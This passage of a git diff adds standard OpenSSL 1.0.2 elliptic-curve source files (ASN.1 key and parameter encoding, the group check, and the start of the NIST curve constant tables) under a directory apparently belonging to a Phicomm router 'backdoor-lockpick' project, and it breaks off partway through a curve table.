+
+    if (!params->order || !params->base || !params->base->data) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_ASN1_ERROR);
+        goto err;
+    }
+
+    if ((point = EC_POINT_new(ret)) == NULL)
+        goto err;
+
+    /* set the point conversion form */
+    EC_GROUP_set_point_conversion_form(ret, (point_conversion_form_t)
+                                       (params->base->data[0] & ~0x01));
+
+    /* extract the ec point */
+    if (!EC_POINT_oct2point(ret, point, params->base->data,
+                            params->base->length, NULL)) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    /* extract the order */
+    if ((a = ASN1_INTEGER_to_BN(params->order, a)) == NULL) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_ASN1_LIB);
+        goto err;
+    }
+    if (BN_is_negative(a) || BN_is_zero(a)) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_INVALID_GROUP_ORDER);
+        goto err;
+    }
+    if (BN_num_bits(a) > (int)field_bits + 1) { /* Hasse bound */
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, EC_R_INVALID_GROUP_ORDER);
+        goto err;
+    }
+
+    /* extract the cofactor (optional) */
+    if (params->cofactor == NULL) {
+        if (b) {
+            BN_free(b);
+            b = NULL;
+        }
+    } else if ((b = ASN1_INTEGER_to_BN(params->cofactor, b)) == NULL) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_ASN1_LIB);
+        goto err;
+    }
+    /* set the generator, order and cofactor (if present) */
+    if (!EC_GROUP_set_generator(ret, point, a, b)) {
+        ECerr(EC_F_EC_ASN1_PARAMETERS2GROUP, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    ok = 1;
+
+ err:if (!ok) {
+        if (ret)
+            EC_GROUP_clear_free(ret);
+        ret = NULL;
+    }
+
+    if (p)
+        BN_free(p);
+    if (a)
+        BN_free(a);
+    if (b)
+        BN_free(b);
+    if (point)
+        EC_POINT_free(point);
+    return (ret);
+}
+
+EC_GROUP *ec_asn1_pkparameters2group(const ECPKPARAMETERS *params)
+{
+    EC_GROUP *ret = NULL;
+    int tmp = 0;
+
+    if (params == NULL) {
+        ECerr(EC_F_EC_ASN1_PKPARAMETERS2GROUP, EC_R_MISSING_PARAMETERS);
+        return NULL;
+    }
+
+    if (params->type == 0) {    /* the curve is given by an OID */
+        tmp = OBJ_obj2nid(params->value.named_curve);
+        if ((ret = EC_GROUP_new_by_curve_name(tmp)) == NULL) {
+            ECerr(EC_F_EC_ASN1_PKPARAMETERS2GROUP,
+                  EC_R_EC_GROUP_NEW_BY_NAME_FAILURE);
+            return NULL;
+        }
+        EC_GROUP_set_asn1_flag(ret, OPENSSL_EC_NAMED_CURVE);
+    } else if (params->type == 1) { /* the parameters are given by a
+                                     * ECPARAMETERS structure */
+        ret = ec_asn1_parameters2group(params->value.parameters);
+        if (!ret) {
+            ECerr(EC_F_EC_ASN1_PKPARAMETERS2GROUP, ERR_R_EC_LIB);
+            return NULL;
+        }
+        EC_GROUP_set_asn1_flag(ret, 0x0);
+    } else if (params->type == 2) { /* implicitlyCA */
+        return NULL;
+    } else {
+        ECerr(EC_F_EC_ASN1_PKPARAMETERS2GROUP, EC_R_ASN1_ERROR);
+        return NULL;
+    }
+
+    return ret;
+}
+
+/* EC_GROUP <-> DER encoding of ECPKPARAMETERS */
+
+EC_GROUP *d2i_ECPKParameters(EC_GROUP **a, const unsigned char **in, long len)
+{
+    EC_GROUP *group = NULL;
+    ECPKPARAMETERS *params = NULL;
+
+    if ((params = d2i_ECPKPARAMETERS(NULL, in, len)) == NULL) {
+        ECerr(EC_F_D2I_ECPKPARAMETERS, EC_R_D2I_ECPKPARAMETERS_FAILURE);
+        ECPKPARAMETERS_free(params);
+        return NULL;
+    }
+
+    if ((group = ec_asn1_pkparameters2group(params)) == NULL) {
+        ECerr(EC_F_D2I_ECPKPARAMETERS, EC_R_PKPARAMETERS2GROUP_FAILURE);
+        ECPKPARAMETERS_free(params);
+        return NULL;
+    }
+
+    if (a && *a)
+        EC_GROUP_clear_free(*a);
+    if (a)
+        *a = group;
+
+    ECPKPARAMETERS_free(params);
+    return (group);
+}
+
+int i2d_ECPKParameters(const EC_GROUP *a, unsigned char **out)
+{
+    int ret = 0;
+    ECPKPARAMETERS *tmp = ec_asn1_group2pkparameters(a, NULL);
+    if (tmp == NULL) {
+        ECerr(EC_F_I2D_ECPKPARAMETERS, EC_R_GROUP2PKPARAMETERS_FAILURE);
+        return 0;
+    }
+    if ((ret = i2d_ECPKPARAMETERS(tmp, out)) == 0) {
+        ECerr(EC_F_I2D_ECPKPARAMETERS, EC_R_I2D_ECPKPARAMETERS_FAILURE);
+        ECPKPARAMETERS_free(tmp);
+        return 0;
+    }
+    ECPKPARAMETERS_free(tmp);
+    return (ret);
+}
+
+/* some EC_KEY functions */
+
+EC_KEY *d2i_ECPrivateKey(EC_KEY **a, const unsigned char **in, long len)
+{
+    int ok = 0;
+    EC_KEY *ret = NULL;
+    EC_PRIVATEKEY *priv_key = NULL;
+
+    if ((priv_key = EC_PRIVATEKEY_new()) == NULL) {
+        ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if ((priv_key = d2i_EC_PRIVATEKEY(&priv_key, in, len)) == NULL) {
+        ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_EC_LIB);
+        EC_PRIVATEKEY_free(priv_key);
+        return NULL;
+    }
+
+    if (a == NULL || *a == NULL) {
+        if ((ret = EC_KEY_new()) == NULL) {
+            ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (a)
+            *a = ret;
+    } else
+        ret = *a;
+
+    if (priv_key->parameters) {
+        if (ret->group)
+            EC_GROUP_clear_free(ret->group);
+        ret->group = ec_asn1_pkparameters2group(priv_key->parameters);
+    }
+
+    if (ret->group == NULL) {
+        ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    ret->version = priv_key->version;
+
+    if (priv_key->privateKey) {
+        ret->priv_key = BN_bin2bn(M_ASN1_STRING_data(priv_key->privateKey),
+                                  M_ASN1_STRING_length(priv_key->privateKey),
+                                  ret->priv_key);
+        if (ret->priv_key == NULL) {
+            ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_BN_LIB);
+            goto err;
+        }
+    } else {
+        ECerr(EC_F_D2I_ECPRIVATEKEY, EC_R_MISSING_PRIVATE_KEY);
+        goto err;
+    }
+
+    if (ret->pub_key)
+        EC_POINT_clear_free(ret->pub_key);
+    ret->pub_key = EC_POINT_new(ret->group);
+    if (ret->pub_key == NULL) {
+        ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    if (priv_key->publicKey) {
+        const unsigned char *pub_oct;
+        int pub_oct_len;
+
+        pub_oct = M_ASN1_STRING_data(priv_key->publicKey);
+        pub_oct_len = M_ASN1_STRING_length(priv_key->publicKey);
+        /*
+         * The first byte - point conversion form - must be present.
+         */
+        if (pub_oct_len <= 0) {
+            ECerr(EC_F_D2I_ECPRIVATEKEY, EC_R_BUFFER_TOO_SMALL);
+            goto err;
+        }
+        /* Save the point conversion form. */
+        ret->conv_form = (point_conversion_form_t) (pub_oct[0] & ~0x01);
+        if (!EC_POINT_oct2point(ret->group, ret->pub_key,
+                                pub_oct, (size_t)(pub_oct_len), NULL)) {
+            ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_EC_LIB);
+            goto err;
+        }
+    } else {
+        if (!EC_POINT_mul
+            (ret->group, ret->pub_key, ret->priv_key, NULL, NULL, NULL)) {
+            ECerr(EC_F_D2I_ECPRIVATEKEY, ERR_R_EC_LIB);
+            goto err;
+        }
+        /* Remember the original private-key-only encoding. */
+        ret->enc_flag |= EC_PKEY_NO_PUBKEY;
+    }
+
+    ok = 1;
+ err:
+    if (!ok) {
+        if (ret)
+            EC_KEY_free(ret);
+        ret = NULL;
+    }
+
+    if (priv_key)
+        EC_PRIVATEKEY_free(priv_key);
+
+    return (ret);
+}
+
+int i2d_ECPrivateKey(EC_KEY *a, unsigned char **out)
+{
+    int ret = 0, ok = 0;
+    unsigned char *buffer = NULL;
+    size_t buf_len = 0, tmp_len;
+    EC_PRIVATEKEY *priv_key = NULL;
+
+    if (a == NULL || a->group == NULL || a->priv_key == NULL ||
+        (!(a->enc_flag & EC_PKEY_NO_PUBKEY) && a->pub_key == NULL)) {
+        ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_PASSED_NULL_PARAMETER);
+        goto err;
+    }
+
+    if ((priv_key = EC_PRIVATEKEY_new()) == NULL) {
+        ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    priv_key->version = a->version;
+
+    buf_len = (size_t)BN_num_bytes(a->priv_key);
+    buffer = OPENSSL_malloc(buf_len);
+    if (buffer == NULL) {
+        ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!BN_bn2bin(a->priv_key, buffer)) {
+        ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    if (!M_ASN1_OCTET_STRING_set(priv_key->privateKey, buffer, buf_len)) {
+        ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_ASN1_LIB);
+        goto err;
+    }
+
+    if (!(a->enc_flag & EC_PKEY_NO_PARAMETERS)) {
+        if ((priv_key->parameters =
+             ec_asn1_group2pkparameters(a->group,
+                                        priv_key->parameters)) == NULL) {
+            ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+
+    if (!(a->enc_flag & EC_PKEY_NO_PUBKEY)) {
+        priv_key->publicKey = M_ASN1_BIT_STRING_new();
+        if (priv_key->publicKey == NULL) {
+            ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        tmp_len = EC_POINT_point2oct(a->group, a->pub_key,
+                                     a->conv_form, NULL, 0, NULL);
+
+        if (tmp_len > buf_len) {
+            unsigned char *tmp_buffer = OPENSSL_realloc(buffer, tmp_len);
+            if (!tmp_buffer) {
+                ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            buffer = tmp_buffer;
+            buf_len = tmp_len;
+        }
+
+        if (!EC_POINT_point2oct(a->group, a->pub_key,
+                                a->conv_form, buffer, buf_len, NULL)) {
+            ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_EC_LIB);
+            goto err;
+        }
+
+        priv_key->publicKey->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+        priv_key->publicKey->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+        if (!M_ASN1_BIT_STRING_set(priv_key->publicKey, buffer, buf_len)) {
+            ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_ASN1_LIB);
+            goto err;
+        }
+    }
+
+    if ((ret = i2d_EC_PRIVATEKEY(priv_key, out)) == 0) {
+        ECerr(EC_F_I2D_ECPRIVATEKEY, ERR_R_EC_LIB);
+        goto err;
+    }
+    ok = 1;
+ err:
+    if (buffer)
+        OPENSSL_free(buffer);
+    if (priv_key)
+        EC_PRIVATEKEY_free(priv_key);
+    return (ok ? ret : 0);
+}
+
+int i2d_ECParameters(EC_KEY *a, unsigned char **out)
+{
+    if (a == NULL) {
+        ECerr(EC_F_I2D_ECPARAMETERS, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    return i2d_ECPKParameters(a->group, out);
+}
+
+EC_KEY *d2i_ECParameters(EC_KEY **a, const unsigned char **in, long len)
+{
+    EC_KEY *ret;
+
+    if (in == NULL || *in == NULL) {
+        ECerr(EC_F_D2I_ECPARAMETERS, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+
+    if (a == NULL || *a == NULL) {
+        if ((ret = EC_KEY_new()) == NULL) {
+            ECerr(EC_F_D2I_ECPARAMETERS, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        if (a)
+            *a = ret;
+    } else
+        ret = *a;
+
+    if (!d2i_ECPKParameters(&ret->group, in, len)) {
+        ECerr(EC_F_D2I_ECPARAMETERS, ERR_R_EC_LIB);
+        return NULL;
+    }
+
+    return ret;
+}
+
+EC_KEY *o2i_ECPublicKey(EC_KEY **a, const unsigned char **in, long len)
+{
+    EC_KEY *ret = NULL;
+
+    if (a == NULL || (*a) == NULL || (*a)->group == NULL) {
+        /*
+         * sorry, but a EC_GROUP-structur is necessary to set the public key
+         */
+        ECerr(EC_F_O2I_ECPUBLICKEY, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    ret = *a;
+    if (ret->pub_key == NULL &&
+        (ret->pub_key = EC_POINT_new(ret->group)) == NULL) {
+        ECerr(EC_F_O2I_ECPUBLICKEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    if (!EC_POINT_oct2point(ret->group, ret->pub_key, *in, len, NULL)) {
+        ECerr(EC_F_O2I_ECPUBLICKEY, ERR_R_EC_LIB);
+        return 0;
+    }
+    /* save the point conversion form */
+    ret->conv_form = (point_conversion_form_t) (*in[0] & ~0x01);
+    *in += len;
+    return ret;
+}
+
+int i2o_ECPublicKey(EC_KEY *a, unsigned char **out)
+{
+    size_t buf_len = 0;
+    int new_buffer = 0;
+
+    if (a == NULL) {
+        ECerr(EC_F_I2O_ECPUBLICKEY, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    buf_len = EC_POINT_point2oct(a->group, a->pub_key,
+                                 a->conv_form, NULL, 0, NULL);
+
+    if (out == NULL || buf_len == 0)
+        /* out == NULL => just return the length of the octet string */
+        return buf_len;
+
+    if (*out == NULL) {
+        if ((*out = OPENSSL_malloc(buf_len)) == NULL) {
+            ECerr(EC_F_I2O_ECPUBLICKEY, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        new_buffer = 1;
+    }
+    if (!EC_POINT_point2oct(a->group, a->pub_key, a->conv_form,
+                            *out, buf_len, NULL)) {
+        ECerr(EC_F_I2O_ECPUBLICKEY, ERR_R_EC_LIB);
+        if (new_buffer) {
+            OPENSSL_free(*out);
+            *out = NULL;
+        }
+        return 0;
+    }
+    if (!new_buffer)
+        *out += buf_len;
+    return buf_len;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_check.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_check.c
new file mode 100644
index 0000000..d3f5349
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_check.c
@@ -0,0 +1,120 @@
+/* crypto/ec/ec_check.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ec_lcl.h"
+#include <openssl/err.h>
+
+int EC_GROUP_check(const EC_GROUP *group, BN_CTX *ctx)
+{
+    int ret = 0;
+    BIGNUM *order;
+    BN_CTX *new_ctx = NULL;
+    EC_POINT *point = NULL;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL) {
+            ECerr(EC_F_EC_GROUP_CHECK, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+    BN_CTX_start(ctx);
+    if ((order = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    /* check the discriminant */
+    if (!EC_GROUP_check_discriminant(group, ctx)) {
+        ECerr(EC_F_EC_GROUP_CHECK, EC_R_DISCRIMINANT_IS_ZERO);
+        goto err;
+    }
+
+    /* check the generator */
+    if (group->generator == NULL) {
+        ECerr(EC_F_EC_GROUP_CHECK, EC_R_UNDEFINED_GENERATOR);
+        goto err;
+    }
+    if (!EC_POINT_is_on_curve(group, group->generator, ctx)) {
+        ECerr(EC_F_EC_GROUP_CHECK, EC_R_POINT_IS_NOT_ON_CURVE);
+        goto err;
+    }
+
+    /* check the order of the generator */
+    if ((point = EC_POINT_new(group)) == NULL)
+        goto err;
+    if (!EC_GROUP_get_order(group, order, ctx))
+        goto err;
+    if (BN_is_zero(order)) {
+        ECerr(EC_F_EC_GROUP_CHECK, EC_R_UNDEFINED_ORDER);
+        goto err;
+    }
+
+    if (!EC_POINT_mul(group, point, order, NULL, NULL, ctx))
+        goto err;
+    if (!EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_EC_GROUP_CHECK, EC_R_INVALID_GROUP_ORDER);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    if (ctx != NULL)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (point)
+        EC_POINT_free(point);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_curve.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_curve.c
new file mode 100644
index 0000000..023bd0e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_curve.c
@@ -0,0 +1,3248 @@
+/* crypto/ec/ec_curve.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+#include <string.h>
+#include "ec_lcl.h"
+#include <openssl/err.h>
+#include <openssl/obj_mac.h>
+#include <openssl/opensslconf.h>
+
+typedef struct {
+    int field_type,             /* either NID_X9_62_prime_field or
+                                 * NID_X9_62_characteristic_two_field */
+     seed_len, param_len;
+    unsigned int cofactor;      /* promoted to BN_ULONG */
+} EC_CURVE_DATA;
+
+/* the nist prime curves */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 24 * 6];
+} _EC_NIST_PRIME_192 = {
+    {
+        NID_X9_62_prime_field, 20, 24, 1
+    },
+    {
+        /* seed */
+        0x30, 0x45, 0xAE, 0x6F, 0xC8, 0x42, 0x2F, 0x64, 0xED, 0x57, 0x95, 0x28,
+        0xD3, 0x81, 0x20, 0xEA, 0xE1, 0x21, 0x96, 0xD5,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x64, 0x21, 0x05, 0x19, 0xE5, 0x9C, 0x80, 0xE7, 0x0F, 0xA7, 0xE9, 0xAB,
+        0x72, 0x24, 0x30, 0x49, 0xFE, 0xB8, 0xDE, 0xEC, 0xC1, 0x46, 0xB9, 0xB1,
+        /* x */
+        0x18, 0x8D, 0xA8, 0x0E, 0xB0, 0x30, 0x90, 0xF6, 0x7C, 0xBF, 0x20, 0xEB,
+        0x43, 0xA1, 0x88, 0x00, 0xF4, 0xFF, 0x0A, 0xFD, 0x82, 0xFF, 0x10, 0x12,
+        /* y */
+        0x07, 0x19, 0x2b, 0x95, 0xff, 0xc8, 0xda, 0x78, 0x63, 0x10, 0x11, 0xed,
+        0x6b, 0x24, 0xcd, 0xd5, 0x73, 0xf9, 0x77, 0xa1, 0x1e, 0x79, 0x48, 0x11,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x99, 0xDE, 0xF8, 0x36, 0x14, 0x6B, 0xC9, 0xB1, 0xB4, 0xD2, 0x28, 0x31
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 28 * 6];
+} _EC_NIST_PRIME_224 = {
+    {
+        NID_X9_62_prime_field, 20, 28, 1
+    },
+    {
+        /* seed */
+        0xBD, 0x71, 0x34, 0x47, 0x99, 0xD5, 0xC7, 0xFC, 0xDC, 0x45, 0xB5, 0x9F,
+        0xA3, 0xB9, 0xAB, 0x8F, 0x6A, 0x94, 0x8B, 0xC5,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE,
+        /* b */
+        0xB4, 0x05, 0x0A, 0x85, 0x0C, 0x04, 0xB3, 0xAB, 0xF5, 0x41, 0x32, 0x56,
+        0x50, 0x44, 0xB0, 0xB7, 0xD7, 0xBF, 0xD8, 0xBA, 0x27, 0x0B, 0x39, 0x43,
+        0x23, 0x55, 0xFF, 0xB4,
+        /* x */
+        0xB7, 0x0E, 0x0C, 0xBD, 0x6B, 0xB4, 0xBF, 0x7F, 0x32, 0x13, 0x90, 0xB9,
+        0x4A, 0x03, 0xC1, 0xD3, 0x56, 0xC2, 0x11, 0x22, 0x34, 0x32, 0x80, 0xD6,
+        0x11, 0x5C, 0x1D, 0x21,
+        /* y */
+        0xbd, 0x37, 0x63, 0x88, 0xb5, 0xf7, 0x23, 0xfb, 0x4c, 0x22, 0xdf, 0xe6,
+        0xcd, 0x43, 0x75, 0xa0, 0x5a, 0x07, 0x47, 0x64, 0x44, 0xd5, 0x81, 0x99,
+        0x85, 0x00, 0x7e, 0x34,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0x16, 0xA2, 0xE0, 0xB8, 0xF0, 0x3E, 0x13, 0xDD, 0x29, 0x45,
+        0x5C, 0x5C, 0x2A, 0x3D
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 48 * 6];
+} _EC_NIST_PRIME_384 = {
+    {
+        NID_X9_62_prime_field, 20, 48, 1
+    },
+    {
+        /* seed */
+        0xA3, 0x35, 0x92, 0x6A, 0xA3, 0x19, 0xA2, 0x7A, 0x1D, 0x00, 0x89, 0x6A,
+        0x67, 0x73, 0xA4, 0x82, 0x7A, 0xCD, 0xAC, 0x73,
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFC,
+        /* b */
